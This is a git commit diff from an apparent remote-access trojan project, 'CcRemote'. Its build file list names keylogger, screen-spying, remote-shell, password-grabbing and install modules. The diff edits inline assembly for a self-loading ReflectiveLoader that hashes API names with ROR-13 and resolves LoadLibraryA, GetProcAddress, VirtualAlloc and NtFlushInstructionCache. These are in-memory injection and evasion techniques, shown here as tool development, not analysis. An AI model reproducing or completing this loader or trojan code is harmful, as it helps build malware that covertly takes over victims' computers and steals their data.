mirror of
https://github.com/Cc28256/CcRemote.git
synced 2025-06-10 22:39:51 +00:00
asm load self success
This commit is contained in:
Cc28257
parent
18d728a346
commit
8b28f3a9ef
Binary file not shown.
@ -1 +1,40 @@
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.lib
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.exp
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.ipdb
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.iobj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\dllmain.obj
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.dll
|
||||
f:\myapp\ccremote\bin\server\ccmaindll.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\ccmaindll.write.1u.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.write.1.tlog
|
||||
|
||||
@ -344,26 +344,26 @@ inline DWORD calc_name_hash()
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
push ecx
|
||||
mov [ebp-4], 0
|
||||
mov dword ptr[ebp-4], 0
|
||||
|
||||
calc_next:
|
||||
mov eax, [ebp-4]
|
||||
mov eax, dword ptr[ebp-4]
|
||||
push eax
|
||||
call call_ror_0xD
|
||||
add esp, 4
|
||||
mov [ebp-4], eax
|
||||
mov ecx, [ebp+8]
|
||||
mov dword ptr[ebp-4], eax
|
||||
mov ecx, dword ptr[ebp+8]
|
||||
movsx edx, byte ptr [ecx]
|
||||
add edx, [ebp-4]
|
||||
mov [ebp-4], edx
|
||||
mov eax, [ebp+8]
|
||||
add edx, dword ptr[ebp-4]
|
||||
mov dword ptr[ebp-4], edx
|
||||
mov eax, dword ptr[ebp+8]
|
||||
add eax, 1
|
||||
mov [ebp+8], eax
|
||||
mov ecx, [ebp+8]
|
||||
mov dword ptr[ebp+8], eax
|
||||
mov ecx, dword ptr[ebp+8]
|
||||
movsx edx, byte ptr [ecx]
|
||||
test edx, edx
|
||||
jnz calc_next
|
||||
mov eax, [ebp-4]
|
||||
mov eax, dword ptr[ebp-4]
|
||||
mov esp, ebp
|
||||
pop ebp
|
||||
retn
|
||||
@ -578,7 +578,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
mov edx, [ebp+var_3c]
|
||||
mov eax, [ebp+varLocalFS30_A] // eax = varLocalFS30_A = 基地址
|
||||
add eax, [edx] // 计算得到函数地址
|
||||
mov [ebp+LoadLibraryA], eax // 保存到局部堆栈LoadLibraryA
|
||||
mov [ebp+pLoadLibraryA], eax // 保存到局部堆栈LoadLibraryA
|
||||
jmp find_index_dec // 查找下一个
|
||||
|
||||
no_LoadLibraryA:
|
||||
@ -597,7 +597,7 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
mov eax, [ebp+var_3c]
|
||||
mov ecx, [ebp+varLocalFS30_A] // ecx = varLocalFS30_A = 基地址
|
||||
add ecx, [eax] // 计算得到函数地址
|
||||
mov [ebp+VirtualAlloc], ecx // 保存到局部堆栈VirtualAlloc
|
||||
mov [ebp+ pVirtualAlloc], ecx // 保存到局部堆栈VirtualAlloc
|
||||
jmp find_index_dec // 查找下一个
|
||||
|
||||
no_VirtualAlloc:
|
||||
@ -701,11 +701,11 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
check_function:
|
||||
cmp dword ptr[ebp+ pLoadLibraryA], 0
|
||||
jz continue_find_function
|
||||
cmp dword ptr[ebp+GetProcAddress], 0
|
||||
cmp dword ptr[ebp+ pGetProcAddress], 0
|
||||
jz continue_find_function
|
||||
cmp dword ptr[ebp+ pVirtualAlloc], 0
|
||||
jz continue_find_function
|
||||
cmp dword ptr[ebp+pNtFlushInstructionCache], 0
|
||||
cmp dword ptr[ebp+ pNtFlushInstructionCache], 0
|
||||
jz continue_find_function
|
||||
jmp find_moudle_over
|
||||
|
||||
|
||||
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user